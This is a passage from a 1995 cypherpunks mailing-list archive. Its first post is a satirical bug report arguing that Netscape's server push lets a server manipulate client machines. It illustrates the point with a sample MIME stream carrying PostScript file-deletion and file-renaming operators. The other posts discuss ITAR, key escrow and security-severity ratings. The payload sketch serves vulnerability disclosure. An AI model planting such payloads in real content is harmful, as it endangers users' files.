hunt) and I thought ... and I thought that security bugs were much too
important to stop this over such a trivial matter, as negotiating my 
rights away for the benefit of possibly getting a mug. 

But there was no time to stop and think.  Security bugs were going to be
our target.  Big Game.  Non of that discretionary mug stuff for us ... we
can't be bribed that easily ... no sirree, bob. 
 
> Netscape is not responsible for late, lost, or misdirected entries.
> All taxes on prizes are the sole responsibility of winners. By 
> participating you agree to these rules and the decisions of the judges, 
> which will be final
> Any disputes concerning this event will be settled by arbitration.

Tax on a mug??  Ok ... I think we understand each other now.  The budget's
tight, and all.  The plan really wasn't well thought out, and of course we
all know that the IPO didn't do that well, and blah, and blah, blah, blah. 

Ahh, but a hunt's a hunt.  So a hunting, we will go.

(Phew, isn't this a long post to the list???  I haven't really said
anything about the SECURITY BUG yet, have I??  Sheesh, I'm so, so
verbose.)

But first, what is a SECURITY BUG, anyway??  What does Netscape's marketing
machine consider a REAL SECURITY BUG??  If we know that, then we'll know 
where to look.

Before we get to that ... one last quote from Netscape's spokesman, Homer.

> "We are continuing to encourage users to provide feedback on new versions
> of our software, and the Netscape Bugs Bounty is a natural extension of
> that process," said  Mike Homer, vice president of marketing at Netscape.
> "By rewarding users for quickly identifying and reporting bugs back to us,
> this program will encourage an extensive, open review of Netscape Navigator
> 2.0 and will help us to continue to create products of the highest
> quality."

Gee, don't worry, Homer.  The POWER OF THE INTERNET will help you to
create products of the highest quality.  And the POWER OF THE INTERNET
will encourage a real extensive open review.  And watch for my new home
page coming to a web site near you. 

The one titled, "I DEBUGGED NAVIGATOR AND ALL I GOT WAS A LOUSY SHIRT."

But back to the question of what is a Security Bug??  Because I'm not sure
if Marketing is going to agree (in its sole discretion) with what a
security bug is (even if it has been hunted down).  So at the risk of
boring everyone to tears, I'll simply provide some external standards on
the matter, just so I don't jeopardize my bounty or my shirt or my mug. 
Let's start with some Orange Book standards. 

The Orange Book, DEPARTMENT OF DEFENSE STANDARD, DEPARTMENT OF DEFENSE
TRUSTED COMPUTER SYSTEM EVALUATION CRITERIA (DoD 5200.28-STD) which we're
all intimately familiar with, since it of course sets the standard for
everyone from the Small Business Administration to the National Science
Foundation, (I think).  Anyhow, it makes these points: 

DoD Directive 5200.28, "Security Requirements for Automatic Data
Processing (ADP) Systems," stipulates: "Classified material contained in
an ADP system shall be safeguarded by the continuous employment of
protective features in the system's hardware and software design and
configuration .  .  .  ."[8, sec.  IV] Furthermore, it is required that
ADP systems that "process, store, or use classified data and produce
classified information will, with reasonable dependability, prevent: 

     a.  Deliberate or inadvertent access to classified material by
         unauthorized persons, and

     b.  Unauthorized manipulation of the computer and its associated
         peripheral devices."[8, sec. I B.3]

The concern here is with the latter standard.  The unauthorized
manipulation of a computer and its associated peripheral devices.  And
this is where we jump onto the scent of the track of the Security Bug. 

And this is where we introduce a little old document called pushpull.html.
from Netscape's Web site.  It's titled:  An Exploration of Dynamic
Documents. 

> The Great Idea
> 
> The general idea is that browsers have always been driven by user
> input.  You click on a link or an icon or an image and some data comes
> to you.  As soon as people saw they could do that, they wanted to give
> a server the ability to push new data down to the browser.  (An
> obvious example is a stock trader who wants to see new quote data
> every 5 minutes.)  Up until now, that hasn't been possible.

And I can think of many people who would _also_ like to push down data
to a browser.  But, that's not a great idea.  Guess what??  It's not even 
a good idea.  It might even be a bad idea.

> Netscape Navigator 1.1 gives content creators and server
> administrators two new open standards-based mechanisms for making this
> work.  The mechanisms are similar in nature and effect, but
> complementary.  They are: 
>
>     Server push -- the server sends down a chunk of data; the
>     browser display the data but leaves the connection open; whenever
>     the server wants it sends more data and the browser displays it,
>     leaving the connection open; at some later time the server sends
>     down yet more data and the browser displays it; etc.

Yes, the client "processes data" and then possibly displays it, while in

>     Client pull -- the server sends down a chunk of data,
>     including a directive (in the HTTP response or the document
>     header) that says "reload this data in 5 seconds", or "go load
>     this other URL in 10 seconds".  After the specified amount of
>     time has elapsed, the client does what it was told -- either
>     reloading the current data or getting new data.

Hmm.  Netscape's clients blindly trust and follows server's instructions
and does what it is told to do.  If it's told to load a particular
document in five seconds.  It does that.  It dances to the server's
instructions. Something which should cause any Security Administrator's
hair to stand on end, as the server takes control of the client's machine 
and "manipulates it".

> In server push, the magic is accomplished by using a variant of the
> MIME message format "multipart/mixed", which lets a single message (or
> HTTP response) contain many data items.  In client pull, the magic is
> accomplished by an HTTP response header (or equivalent HTML tag) that
> tells the client what to do after some specified time delay. 
>
> For server push we use a variant of "multipart/mixed" called
> "multipart/x-mixed-replace".  The "x-" indicates this type is
> experimental.  The "replace" indicates that each new data block will
> cause the previous data block to be replaced -- that is, new data will
> be displayed instead of (not in addition to) old data. 
> 
> So here's an example of "multipart/x-mixed-replace" in action: 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the first object.
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the second and last object.
>>
>>--ThisRandomString--
> 
> The key to the use of this technique is that the server does not push
> the whole "multipart/x-mixed-replace" message down all at once but
> rather sends down each successive data block whenever it sees
> fit.  

And this is the problem.  We have a pipe.  And we have a server making a
decision when it will send the next data block.  I guess the server could
also decide dynamically what that data block is going to be once it has
opened it's pipe to the client. 

That is way too much trust for a client to place in a server that it 
doesn't know if it can trust.

> The HTTP connection stays open all the time, and the server
> pushes down new data blocks as rapidly or as infrequently as it wants,
> and in between data blocks the browser simply sits and waits for more
> data in the current window.  The user can even go off and do other
> things in other windows; when the server has more data to send, it
> just pushes another data block down the pipe, and the appropriate
> window updates itself. 

Yep, the appropriate window just "updates" itself at the command of 
the server.  A good faith update ... or let's call it a good faith 
process. 

> So here's exactly what happens:
>
>     Following in the tradition of the standard "multipart/mixed",
>     "multipart/x-mixed-replace" messages are composed using a unique
>     boundary line that separates each data object.  Each data object
>     has its own headers, allowing for an object-specific content type
>     and other information to be specified.

Let's emphasize that what we have is a slave client at one end of a pipe
accepting an object-specific content-type from any server.  

This is not within the tradition of multipart/mixed. 

And this is a problem.

>     The specific behavior of "multipart/x-mixed-replace" is that each
>     new data object replaces the previous data object.  The browser
>     gets rid of the first data object and instead displays the second
>     data object. 
>
>     A "multipart/x-mixed-replace" message doesn't have to end!  That
>     is, the server can just keep the connection open forever and send
>     down as many new data objects as it wants.  The process will then
>     terminate if the user is no longer displaying that data stream in
>     a browser window or if the browser severs the connection
>     (e.g. the user presses the "Stop" button).  We expect this will
>     be the typical way people will use server push. 
>
>     The previous document will be cleared and the browser will begin
>     displaying the next document when the "Content-type" header is
>     found, or at the end of the headers otherwise, for a new data block.
>     The current data block (document) is considered finished when the
>     next message boundary is found. 
>
>     Together, the above two items mean that the server should push
>     down the pipe: a set of headers (most likely including
>     "Content-type"), the data itself, and a separator (message
>     boundary).  When the browser sees the separator, it knows to sit
>     still and wait indefinitely for the next data block to arrive. 

Now let's play with the prior example.  Let's say that we utilized
different types of objects.  I'll use multipart/parallel and
application/postscript. 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: application/postscript
>>
>>Data for the first object
>>
>>--ThisRandomString
>>Content-Type: multipart/parallel; boundary=ThisSecondRandomString
>>
>>--ThisSecondRandomString
>>Content-Type: application/postscript
>>
>>Data for the second object
>>
>>--ThisSecondRandomString
>>Content-type: application/postscript
>>
>>Deletefile
>>Renamefile
>>Filenameforall
>>File
>>
>>--ThisSecondRandomString--
>>
>>--ThisRandomString--

I think that the foregoing explains itself without me having to draw any
more maps, than is absolutely necessary.  The first data object sent is
application/postscript.  The second object is multipart/parallel. 

And it's where we conflict with federal requirements:

>    b.  Unauthorized manipulation of the computer and its associated
>        peripheral devices."[8, sec. I B.3]

And I think that this is applicable across the entire product line.

I wonder if this makes me eligible for a bounty for each product where 
there is this Security Bug??  That would be very chivalrous of Netscape
to offer me that.  Then maybe I could get a real computer rather than 
this crufty old Mac Plus (a yellow one) and my 2400 baud modem... and 
then, I might just be able to do some virtually real hunting.




Alice de 'nonymous ... (doing a bad impression of Elmer Fudd with 
                        thoughts of Bugs Bounty in his lil mind.)


                                  ...just another one of those...


P.S.  And yes I brought this whole issue (tangentially) to the 
attention of netscape.com yesterday afternoon.  I think I asked 
whether they were going to have a formal specification and register
their x-mixed-replace with IANA.  They haven't gotten to my email
yet, (I think).  Or maybe, I'm in the Bulk response group. <shrug>

P.P.S.  I give permission to have this propogate freely through 
        the cyber-aethyr.  All other rights are of course reserved.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 13 Oct 95 06:52:41 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Identity database, another attempt...
In-Reply-To: <Pine.SOL.3.91.951012172747.18484C-100000@use.usit.net>
Message-ID: <9510131347.AA18300@outland>
MIME-Version: 1.0
Content-Type: text/plain


[ Stuff about nat'l DB to track "deadbeat dads" removed ]
> (3.) Compare and contrast this plan with the Soviet 
> internal passport / labor book system.

	Not really related to the deadbeat dads thing, but we
got a notice that the US DOT has mandated that all air passengers
must present a gov't issue photo ID with a name that matches that
on your ticket.  In addition it says that passengers should:

	* be prepared to answer questions about their bags.
	* be prepared to open the trunk of their car.

	Goodbye freedom, hello police state.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 10:14:39 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <aca3eae70c021004f9ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:22 AM 10/13/95, an116512@anon.penet.fi wrote:

>why is the cp meeting sponsored by sun?
>so we can hear a sales pitch on java?

Again, anonymity is used to cloak an ignorant flame.

But I'll respond anyway.

First, who cares who hosts the meeting? Does anyone think we are so
"corruptable" as to change opinions based on who hosts a meeting?

Second, we met for our first 15-18 months at the Mountain View offices of
Cygnus Support. Did this taint us? Did we all become Gnu hackers? Then we
met for about a year at the Mountain View offices of Silicon Graphics. Same
question.

Third, there is much interest in Java. Positive interest, and skeptical
interest. Most meetings have a focus on some topic....this one happens to
be a focus on Java.

Fourth, Marianne Mueller is coordinating this meeting, and she happens to
work for Sun. We should be glad we have a meeting site.

(Meeting sites that can hold 25-40 people for an entire afternoon are not
that easy to find. Pizza places typically don't get enthusiastic about
all-day meetings. Homes are typically too small. And so it goes.)

So, come out of your anonymity and stop the mindless insults.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 13 Oct 95 07:27:57 PDT
To: dl@hplyot.obspm.fr (Laurent Demailly)
Subject: Re: OneTimePasswd (not Pad)
In-Reply-To: <9510131250.AA28930@hplyot.obspm.fr>
Message-ID: <199510131429.KAA08941@homeport.org>
MIME-Version: 1.0
Content-Type: text



| I'm about to implement an OTPasswd (mostly like s/key) scheme to my
| www browsers/clients/proxy, but I was wondering is the mere principle
| of storing H^n(S) and requesting H^(n-1) from peer (H beeing your
| favorite one way strong hash function (MD5), and S your seed+secret
| passwd) could possibly be patented somehow and thus preventing using a
| similar scheme without getting a license (from
| bellcore?),.... if there are any usage conditions/restrictions?,... 

	There is an IETF working group standardizing OTPassword
technology.  not sure how active it still is.
ietf-otp-request@@bellcore.com 

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 13 Oct 95 07:29:48 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510121731.A6228-0100000@offshore.com.ai>
Message-ID: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Vincent Cate wrote:
[..] 

> If while you are outside the USA you want to write some software that uses
> encryption and sell it worldwide, let me know.  I could put you up while
> you wrote it and my company could sell it for share of the selling price. 
> Let me know what you are thinking of and how long you think it would take. 

Of course if you are a US person (citizen or green card holder) this is 
just as much a violation of the ITAR than if you did it from inside the US...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Fri, 13 Oct 95 07:39:35 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Judicial Access to Keys (Was: Re: Banque des Cypherpunks)
In-Reply-To: <199510120730.DAA01478@thor.cs.umass.edu>
Message-ID: <Pine.D-G.3.91.951013101859.5382B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Futplex wrote:

> Scott Brickner writes:
> > I don't rember if any key-splitting schemes currently allow it, but how
> > about this:  the escrow agencies would be the courts, requiring one
> > assent from each judge on the appeals chain.  As each judge rules
> > against the defendant or denies the appeal, he adds his piece of the
> > key to the ruling.  When you reach the top of the chain, then *and only
> > then* can you be traced.
> 
> JAK (Judicial Access to Keys) sounds as though it wouldn't give the LEAs a 
> chance to pre-emptively snoop on message traffic before prosecution, unlike
            ^^^^^^^^^^^^^                          ^^^^^^ 
> POTS wiretaps and Clipper. I don't see the govt. ever favoring such a
> scheme that doesn't help the LEAs to "gather" evidence to justify an
> indictment. They will probably skip JAK instead <ducking ;>....

I think that the bigger concern would be that a small set of judges at 
each level would be designated JAK judges (god forbid that they all have 
some idea of what the issues are ...).  Then LEA would be certain to 
present only the most egregious cases to them until they got in the habit 
of signing off on them.   Then, the marginal requests for access would 
slide through.  

I think Futplex insinuated that this would occur post charge rather than 
pre charge, to which LEA would never agree.  You can't indict without 
evidence (at least in theory :-)) and and if you're going to get blown 
out of the water as soon as the encrypted traffic is decrypted by the 
defendants for trial ...  well, let's just say it is better to lose early 
and quietly than later and in public.

All this said, and after much personal wailing and gnashing of teeth, I 
*personally* believe GAK/MKE/JAK etc. is unworkable and should be quietly 
dropped.  With so many ways around key escrow,  especially the 
existence of PGP, I think the horse has left the barn.  The issue won't 
be dropped, of course, at least in the short run.  I appreciate all the 
thoughtful replies to my "Cypherpunks Key Escrow" proposal, and will 
ignore the few that were, ahem, not so thoughtful.

I've been avoiding posting about this for weeks due to my own indecision, 
my workload, and a sprained wrist which makes typing an adventure, but 
when directed to "write an article for [a law enforcement magazine] that 
is pro-MKE," I had to reach a personal decision about this.  I am 
generally very open about what I think/believe etc. and have few secrets 
from my friends.   I get the impression that the majority of you have a 
different view about your personal life, but that's why Baskin-Robbins 
has 31 flavors, not one.

I also strongly believe that you gravely overestimate the threat of MKE, 
probably overestimate the interest LEAs have in your personal affairs, 
and have little idea how hard it is to get court approval for wiretaps, 
and presumably access to escrowed keys.  I did mention to my U.S. 
Attorney that the proposal that "other lawful authorities" [besides 
judges] could grant access to escrowed keys was especially bothersome.  
He took it well, and said that was a legitimate point (that I don't think 
will go anywhere).

Now understand that, as a lawyer, I get paid to say what my client (the 
USA) wants me to say, within certain bounds, so I will write the 
article.  My heart will not be in it, though. 

I would appreciate it if you wouldn't send this to Janet Reno or 
otherwise use it, with attribution, at least until I find a new job!  :-)
I stay in enough trouble here without this being circulated through the 
Department and placed in my personnel file.

Lest there be any doubt: I SPEAK ONLY FOR MYSELF on this issue.  The 
Department's and the Administration's* position has not changed to my 
knowledge (except as has previously been discussed in this forum).

*****


*Some of you like to blame the Clinton Administration for all of this.  
Be mindful that all this started in the Bush Administration or earlier.  
There's plenty of blame to go around.  I encourage the Cypherpunks 
anarchy to use its recent successes with Netscape, and soon with MS, 
together with its concommitant increase in credibility to educate the 
public and the politicians.

EBD

 
> -Futplex <futplex@pseudonym.com>
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 10:42:54 PDT
To: vince@offshore.com.ai>
Subject: Exporting Mental States
Message-ID: <aca3efb20f0210041a0a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:30 PM 10/13/95, Michael Froomkin wrote:
>On Thu, 12 Oct 1995, Vincent Cate wrote:
>[..]
>
>> If while you are outside the USA you want to write some software that uses
>> encryption and sell it worldwide, let me know.  I could put you up while
>> you wrote it and my company could sell it for share of the selling price.
>> Let me know what you are thinking of and how long you think it would take.
>
>Of course if you are a US person (citizen or green card holder) this is
>just as much a violation of the ITAR than if you did it from inside the US...

And recalling Matt Blaze's hilarious tale of trying to get the right forms
filled out and approved at an airport prior to departure for Europe, one
has to wonder what confused looks would be gotten were someone to try to
get a "Commodity Jurisdiction Request" (or whatever is needed) to export
one's thoughts....

"Yes, I'm trying to find out what forms I need to fill out to export the
cryptography knowledge that's now in my head."

"Huh?"

"Well, I understand that it's illegal for me to think crypto thoughts in
Anguilla, where I'm going on vacation. So, to protect me in the event I
talk in my sleep, and a foreign national hears me, I want to register with
your office."

"Huh?"

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Thu, 12 Oct 95 10:59:12 PDT
To: cypherpunks@toad.com
Subject: IDEA algorithm
Message-ID: <v02120d01aca45743fb66@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


This may be an odd question, but who is it that owns the IDEA algorithm?

We've had a number of requests regarding licensing RSAREF tying into
legitmizing PGP products. Part of that includes IDEA obviously.

Anyway, take care.

Jonathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Fri, 13 Oct 95 08:22:48 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
Message-ID: <Pine.3.89.9510131128.A6667-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Michael Froomkin wrote:
> On Thu, 12 Oct 1995, Vincent Cate wrote:
> > If while you are outside the USA you want to write some software that uses
> > encryption and sell it worldwide, let me know.  I could put you up while
> > you wrote it and my company could sell it for share of the selling price. 
> > Let me know what you are thinking of and how long you think it would take. 
> 
> Of course if you are a US person (citizen or green card holder) this is 
> just as much a violation of the ITAR than if you did it from inside the US...
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 

Yes, I am still a US citizen, so far. 

The corporation I work for is a legal entity of Anguilla.  I would not
personally be selling it, the corporation would.  Do you think that is ok? 

What if I had a couple Anguillian friends form a corporation for this
purpose (buying encryption software written in Anguilla and selling it
internationally)?  No trouble yet, right?  What if the people who come and
write it are US citizens?  

I don't see how US law can cover corporations in other countries.

PS - it is good to CC me (as you did) as I only get cypherpunks-lite, and
so may not see a message, or it may be delayed. 

Thanks,

  --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ron McCoy <rmccoy@mercury.interpath.com>
Date: Fri, 13 Oct 95 08:35:08 PDT
To: cypherpunks@toad.com
Subject: Re: responce to graphic encryption replies
In-Reply-To: <199510130432.AAA14986@thor.cs.umass.edu>
Message-ID: <199510131535.LAA01216@mercury.interpath.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Steve Orrin writes:
> [...]
> >     One of the key strengths, as I see it, of graphic encryption is 
> > that during decryption via hacking, there is an added time element when 
> > a human interface is required to verify the product, ( since it is a 
> > graphic picture being produced, regular checksums for intelligible 
> > words can't be used sans implementing OCR), even if this is only 10 
> > milliseconds per try this is increases the time to crack 
> 
> This is an interesting point I hadn't previously considered. Can anyone
> comment on the state of the art in fast approximate character recognition ?
> I expect that the people working on recognition of text in TV pictures etc.
> would have a good idea. 
> 
[....] 
> 
> -Futplex <futplex@pseudonym.com>
> 

I wouldn't think you would have to use OCR to detect a successful 
decryption. The graphic file is going to have a highly correlated 
structure, long runs of white space etc. The statistics for such a file 
would be different than the random distribution you'd get from using the 
wrong key. Even if the graphics format is compressed, leading to a more 
even distribution, there might be known plaintext at the beginning of the 
file, headers, size etc.


Ron McCoy
Rmccoy@mercury.interpath.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 13 Oct 95 08:41:34 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
Message-ID: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Michael Froomkin wrote:

> > If while you are outside the USA you want to write some software that uses
> > encryption and sell it worldwide, let me know.  I could put you up while
> > you wrote it and my company could sell it for share of the selling price. 
> > Let me know what you are thinking of and how long you think it would take. 
> 
> Of course if you are a US person (citizen or green card holder) this is 
> just as much a violation of the ITAR than if you did it from inside the US...

Really? I thought except for incomes taxes, US laws only apply in American
territory as opposed to applying to American people wherever they are (as 
I heard Germany's does).

What if you were a dual citizen (US/Canada in my case)?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Oct 95 11:42:51 PDT
To: cypherpunks@toad.com
Subject: proposal: "security spectrum scale" (SSS)
Message-ID: <199510131841.LAA17086@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



regarding the recent Markoff NYT article on NFS weaknesses, I agree
it seemed to be overblown. but in fact I have been betting that feeling
from *all* the recent articles on the netscape bugs etc (egad, am I
mistaken, or whas there front page NYT coverage for a *buffer*overflow*?
at least there was for a single *poorly generated random seed*!!). 
for example, in another, the fact that netscape had a buffer overflow in URLs
was translated by a reporter into "a similar bug was used by Robert
Morris in the infamous worm that infected the entire internet a few
years ago" or something similar.

it seems to me what is lacking in all this is a *security spectrum*.
unfortunately security experts sometimes have a tendency to equate
*any* security weakness with a catastrophic one. while this is a good
approach in general, i.e. to be as conservative as possible, in 
practice there can be no doubt that some security weaknesses are far
less severe than others.

if the security *experts* conflate the issue of the *severity* of
a security breach (and I see this happening all the time on this
list), there is little surprise that reporters aren't
figuring it out either. some of the really obvious example of the kinds of
differences in security that are being conflated: client vs. server
problems (server problems are far worse of course; the netscape bugs
were mostly *client* problems), subnet vs. overall network problems, bugs
that allow people to merely crash a system vs. submit arbitary
code, etc.

to aid this serious problem, I propose the creation of a 
UNIFIED SECURITY SPECTRUM RANKING.

this would be a list of all the different types of security weaknesses
a system can have, and their LEVEL OF SEVERITY. it would attempt to 
rank every type of security breach possible. then, when a new
security weakness is discovered, it could be ranked A1 or B5 or C6
or whatever. this would be a sort of technological "richter scale"
that would allow the novice to immediately understand that a given
bug that was recently discovered (say, the recent netscape bugs)
was, say, not really as potentially severe as the Morris worm.

a press article might say something like,  "the recent netscape
bug was ranked a B5 on the security scale by experts. this means that an 
unauthorized intruder could break client software. the bug could
potentially be as serious as A3, meaning that arbitrary code could
be submitted. the other bug was classed B3, because it allows the
detector to grab unauthorized data, but still be detected in 
doing so." 

etc!!

I think it is pretty obvious how much of a positive effect this could
have in quantifying and tracking and publicizing new bugs. it might
make it impossible for a reporter to give an improperly alarmist
position. for example, no one would take seriously an article that
gets excited about a 3.6 richter scale earthquake. similarly, the
reader might be able to draw his own conclusions if we came up with
a sufficiently universal scale and it is widely used in articles.

furthermore, this scale would tend to help the reporter/editor immediately know
if a given bug report is newsworthy (if they continue to enthusiastically
report bugs, although I wonder if this is a fad that may die out).
and ultimately it might really help the issue of "proper attention
to bugs". the public is getting a scare story for almost every new
bug, and this is just not appropriate. to use my tired analogy, it is
like the media putting every dinky earthquake item on page 1.

another idea behind the rating: it might be a sort of matrix format,
such as "a-6-alpha" where each of the elements indicates some kind
of independent factor. for example the "a" might mean "client side",
the "6" might mean "crash only", the "alpha" might mean "breach
cannot be detected after the fact". however it shouldn't be so
complicated that the novice can't immediately determine which of
two rankings is more severe.

now, I am really rather surprised that no such scale appears to 
exist currently. I highly suspect the NSA probably has a system for
this but unfortunately it is not being used by CERT or anyone else
that I know of. if anyone does know of this kind of "security spectrum",
I think our cause of trying to improve software security would be
furthered immensely if whenever reporters call about bugs, the scale
factor could be consistently and uniformly used in association with 
trying to describe the severity of the bug.

I am willing to work on a beta version of this "security spectrum"
if there is sufficient interest. it certainly seems like a far better and 
worthwhile investment of time than, say, "the geek code", the latter of which
is already highly developed!! I don't really consider myself the best 
qualified in terms of experience but sometimes if you want something done, you
have to do it yourself.

however, if we do this, I hope that a good scale that is pretty general
and doesn't need extensions can be done from the start, before its widespread
usage, so that later changes do not confuse users. there is already 
confusion in the media about two slightly different richter scales, this
is a pity. 

another neat perq: if the cypherpunks come up with a good scale, it
could be a tremendous positive publicity tool. "today experts discovered
a bug in -x- that rated a -y- on the CSSS (Cypherpunk Security Spectrum Scale)"

generally, regarding cypherpunk priorities, I think the "media can be made 
our friend", but we just have to learn how to be more meticulous and 
careful in our interactions with them. in general I don't really think
a lot of the misreporting going on is the fault of the reporters involved.
it's not surprising they get their stories mixed up, when, IMHO, even
the "experts" they quote aren't particularly polished and don't really have 
their act fully together (or at least, tend to misrepresent the problems
from the beginning).

(most of the last Markoff article imho can just be chalked up to, "two 
prestigious graduate students who discovered something significant recently 
wrote a message warning about another significant security problem."  it shows
how absolutely critical it is to be careful what you say once you have
built up a bit of a reputation.  these two grad students are now being
watched as the Chicken Little's of Cyberspace by the media, unfairly
or not. be careful about wishing about fame, or anything else!! you might
get it!! makes me a bit nervous about causes *I* have promoted in the 
distant past.)

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 13 Oct 95 08:47:42 PDT
To: cypherpunks@toad.com
Subject: NNTP holes paper updated thatnks to Rich Salz
Message-ID: <9510131545.AA27613@all.net>
MIME-Version: 1.0
Content-Type: text


	Rich Salz read over the NNTP paper and helped greatly to
improve it.  The new version is now on-line.

	Thank you Rich.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Fri, 13 Oct 95 08:48:07 PDT
To: cypherpunks@toad.com
Subject: Re: Insecurity Section of the Internet Handbook
In-Reply-To: <199510131209.NAA20556@utopia.hacktic.nl>
Message-ID: <199510131547.LAA23036@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com writes:
 > For zoetrope, and others curious about the Insecurity
 > section of the Internet Handbook, we pass along this
 > Yellow Pages advert-insert comp sec teaser from
 > SAIC -- with only dribbles of cryptography. The puffery
 > appears to be artfully fattened and out-of-date. Like most
 > security porkers, SAIC sells its nitrated sec services
 > dearly (security by deep pockets of the fearful engorgers)
 > while feigning Net public-spirit to mask IP search and
 > steal. In a telling slight, SAIC does not cite outturned-
 > pockets, beef jerky Cypherpunks.

Anonymous remailers are great, but I'm not sure how much good they do
if you have (or, I suppose, you are a brilliant imitator of) the
unmistakeable writing style of John Young.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 13 Oct 95 08:57:42 PDT
To: Cypherpunks <froomkin@law.miami.edu>
Subject: Who is liable under ITAR (was Re: Anguilla Cypherpunks Meeting)
In-Reply-To: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
Message-ID: <m0t3mVR-0004MhC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: On Thu, 12 Oct 1995, Vincent Cate wrote:
: [..] 
: 
: > If while you are outside the USA you want to write some software that uses
: > encryption and sell it worldwide, let me know.  I could put you up while
: > you wrote it and my company could sell it for share of the selling price. 
: > Let me know what you are thinking of and how long you think it would take. 
: 
: Of course if you are a US person (citizen or green card holder) this is 
: just as much a violation of the ITAR than if you did it from inside the US...

And of course if you are not a US person this is just as much a
violation of the ITAR as if you were a US person.  The ITAR does not
exempt foreign persons from its requirements, though it does make them
